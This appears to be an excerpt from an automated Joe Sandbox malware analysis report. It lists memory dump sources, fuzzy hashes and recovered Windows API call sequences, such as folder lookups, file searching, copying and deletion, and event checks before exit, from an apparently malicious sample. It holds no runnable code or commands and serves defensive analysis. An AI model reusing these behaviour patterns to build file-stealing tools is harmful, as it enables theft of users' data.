                                                        • Source File: 00000000.00000002.1574689759.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2cf0000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: File$CloseCreateHandleSize
                                                        • String ID:
                                                        • API String ID: 1378416451-0
                                                        • Opcode ID: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                                        • Instruction ID: 98029461c5bb19402af43bd98c659a4944dd8740e9c136205c3d606733c4a0eb
                                                        • Opcode Fuzzy Hash: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                                        • Instruction Fuzzy Hash: 8DF01939E40208BBDB20DFB1DC99BDE77BAAB49710F108654BA11A72D0D6359A01CB40
                                                        APIs
                                                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 02D06D31
                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 02D06D4F
                                                        • CloseHandle.KERNEL32(00000000), ref: 02D06D60
                                                        • Sleep.KERNEL32(00001770), ref: 02D06D6B
                                                        • CloseHandle.KERNEL32(?,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 02D06D81
                                                        • ExitProcess.KERNEL32 ref: 02D06D89
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1574689759.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2cf0000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                                        • String ID:
                                                        • API String ID: 941982115-0
                                                        • Opcode ID: 5d3735d569cffe7bbea000e7acfc03b16a2d4300877d619867e3aa12521868c8
                                                        • Instruction ID: 0fc71a7ce83da52fcb165dcfd5964efc95d51813958bf3cfd4ade252ce6391ad
                                                        • Opcode Fuzzy Hash: 5d3735d569cffe7bbea000e7acfc03b16a2d4300877d619867e3aa12521868c8
                                                        • Instruction Fuzzy Hash: A9F03A78940209AEE710EBE1DC88BBD767AEB05741F101518E602A52E0EBB08901CAB6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: `o@
                                                        • API String ID: 0-590292170
                                                        • Opcode ID: 7ad59576bd09cc7eceacd48e5d7f84764234e902501c4ca3efc067249123903a
                                                        • Instruction ID: c65cc5113f4fbf7636557f8b1f026e9f2285814709fd8c8344c4410f81c0aea8
                                                        • Opcode Fuzzy Hash: 7ad59576bd09cc7eceacd48e5d7f84764234e902501c4ca3efc067249123903a
                                                        • Instruction Fuzzy Hash: A66138B4900219EFCB14DF94E944BEEB7B1BB04304F1185AAE40A77380D739AEA4DF95
                                                        APIs
                                                          • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                        • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414BEA
                                                        • lstrcatA.KERNEL32(?,02EBA688), ref: 00414C08
                                                          • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                                          • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                                          • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                                          • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                                          • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                                          • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                                                          • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149B0
                                                          • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,004208D2), ref: 004149C5
                                                          • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149E2
                                                          • Part of subcall function 00414910: PathMatchSpecA.SHLWAPI(?,?), ref: 00414A1E
                                                          • Part of subcall function 00414910: lstrcatA.KERNEL32(?,02EBB138,?,000003E8), ref: 00414A4A
                                                          • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FF8), ref: 00414A5C
                                                          • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A70
                                                          • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FFC), ref: 00414A82
                                                          • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A96
                                                          • Part of subcall function 00414910: CopyFileA.KERNEL32(?,?,00000001), ref: 00414AAC
                                                          • Part of subcall function 00414910: DeleteFileA.KERNEL32(?), ref: 00414B31
                                                          • Part of subcall function 00414910: wsprintfA.USER32 ref: 00414A07
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                        • String ID: UaA
                                                        • API String ID: 2104210347-3893042857
                                                        • Opcode ID: 8ba6efb70901ca5478d437239848c433a21302fddde02a53de9488f6e8c4bcee
                                                        • Instruction ID: 5a37e5a53a2562059c730f6b0b3ae842953eee94398a2728108a858f2c1bafc2
                                                        • Opcode Fuzzy Hash: 8ba6efb70901ca5478d437239848c433a21302fddde02a53de9488f6e8c4bcee
                                                        • Instruction Fuzzy Hash: 9341C5BA6001047BD754FBB0EC42EEE337DA785700F40851DB54A96186EE795BC88BA6
                                                        APIs
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                        • GetSystemTime.KERNEL32(?,02E84C48,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: SystemTimelstrcpy
                                                        • String ID: cI@$cI@
                                                        • API String ID: 62757014-1697673767
                                                        • Opcode ID: 728e3afec194442a0a20c9b4cf47b2a0a0f7365ad80767aaeb7a96b2b5f46ac6
                                                        • Instruction ID: 15f3dfc6f8d56a301bf8b2a7a9260479b6db203ca669f730be279af5ebf73ee3
                                                        • Opcode Fuzzy Hash: 728e3afec194442a0a20c9b4cf47b2a0a0f7365ad80767aaeb7a96b2b5f46ac6
                                                        • Instruction Fuzzy Hash: 7111E971D00008AFCB04EFA9C8919EE77B9EF58314F04C05EF01667241DF38AA86CBA6
                                                        APIs
                                                          • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                        • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 0041508A
                                                        • lstrcatA.KERNEL32(?,02EB9EC0), ref: 004150A8
                                                          • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                                          • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcat$FileFindFirstFolderPathwsprintf
                                                        • String ID: aA
                                                        • API String ID: 2699682494-2567749500
                                                        • Opcode ID: d64dcdbc5a5b078ecf4a674937750308087945107cc9d2085dbcd85f67f2e6ce
                                                        • Instruction ID: 27646669aa04729862e240b26620d37997e147c17b59a732ce93ef494e7ce50b
                                                        • Opcode Fuzzy Hash: d64dcdbc5a5b078ecf4a674937750308087945107cc9d2085dbcd85f67f2e6ce
                                                        • Instruction Fuzzy Hash: B801D6BAA4020877C714FBB0DC42EEE333CAB55304F00415DB68A570D1EE789AC88BA6
                                                        APIs
                                                          • Part of subcall function 02D0A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02D0A9EF
                                                          • Part of subcall function 02D0AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02D0AC2C
                                                          • Part of subcall function 02D0AC17: lstrcpy.KERNEL32(00000000), ref: 02D0AC6B
                                                          • Part of subcall function 02D0AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02D0AC79
                                                          • Part of subcall function 02D0AB87: lstrcpy.KERNEL32(00000000,?), ref: 02D0ABD9
                                                          • Part of subcall function 02D0AB87: lstrcat.KERNEL32(00000000), ref: 02D0ABE9
                                                          • Part of subcall function 02D0AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02D0AB6C
                                                          • Part of subcall function 02D0AA07: lstrcpy.KERNEL32(?,00000000), ref: 02D0AA4D
                                                          • Part of subcall function 02CFA077: memcmp.MSVCRT(?,00421264,00000003), ref: 02CFA094
                                                        • lstrlen.KERNEL32(00000000), ref: 02CFBF06
                                                          • Part of subcall function 02D09097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 02D090B9
                                                        • StrStrA.SHLWAPI(00000000,004213E0), ref: 02CFBF34
                                                        • lstrlen.KERNEL32(00000000), ref: 02CFC00C
                                                        • lstrlen.KERNEL32(00000000), ref: 02CFC020
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1574689759.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2cf0000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
                                                        • String ID:
                                                        • API String ID: 1440504306-0
                                                        • Opcode ID: 9e08ee45ebc43fe706c0c8ad989736c962bf943befa7584f1b5ac42d019a3d06
                                                        • Instruction ID: ecc600d550369e2a3db23311f4af9b5b6a1a1bcaf3b82429e1df8ddf5751cb1a
                                                        • Opcode Fuzzy Hash: 9e08ee45ebc43fe706c0c8ad989736c962bf943befa7584f1b5ac42d019a3d06
                                                        • Instruction Fuzzy Hash: 92B1D876910218ABCB18EBA0DD95EEE733AEF54304F50415DA606A62E0EF746F48CF71
                                                        APIs
                                                          • Part of subcall function 02D09047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 02D09072
                                                        • lstrcat.KERNEL32(?,00000000), ref: 02D051E1
                                                        • lstrcat.KERNEL32(?,00421070), ref: 02D051FE
                                                        • lstrcat.KERNEL32(?,0064A5F8), ref: 02D05212
                                                        • lstrcat.KERNEL32(?,00421074), ref: 02D05224
                                                          • Part of subcall function 02D04B77: wsprintfA.USER32 ref: 02D04B93
                                                          • Part of subcall function 02D04B77: FindFirstFileA.KERNEL32(?,?), ref: 02D04BAA
                                                          • Part of subcall function 02D04B77: StrCmpCA.SHLWAPI(?,00420FDC), ref: 02D04BD8
                                                          • Part of subcall function 02D04B77: StrCmpCA.SHLWAPI(?,00420FE0), ref: 02D04BEE
                                                          • Part of subcall function 02D04B77: FindNextFileA.KERNEL32(000000FF,?), ref: 02D04DE4
                                                          • Part of subcall function 02D04B77: FindClose.KERNEL32(000000FF), ref: 02D04DF9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1574689759.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2cf0000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                                        • String ID:
                                                        • API String ID: 2667927680-0
                                                        • Opcode ID: fea607eff97497eb4fd5309f6b34a87d5e7f8ff3753410a5b2e417b1bb1efa56
                                                        • Instruction ID: e3998c4ae2065d03defa588a9adde1950d63517d52defad047e03cd0194b54cc
                                                        • Opcode Fuzzy Hash: fea607eff97497eb4fd5309f6b34a87d5e7f8ff3753410a5b2e417b1bb1efa56
                                                        • Instruction Fuzzy Hash: 0421887AA40204BBC754FBE0DC85FE9337AEB55700F4045897649921D0DE749AC9CFA1
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1574689759.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2cf0000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpynlstrlenwsprintf
                                                        • String ID:
                                                        • API String ID: 1206339513-0
                                                        • Opcode ID: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                                        • Instruction ID: 26c64170f284f530098d7094ad94435e79950c1066b6f577e389d91ba9f2576d
                                                        • Opcode Fuzzy Hash: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                                        • Instruction Fuzzy Hash: EB010879540108FFCB04DFECD998EAE7BBAEB49394F108148F9099B341C631EA40CB95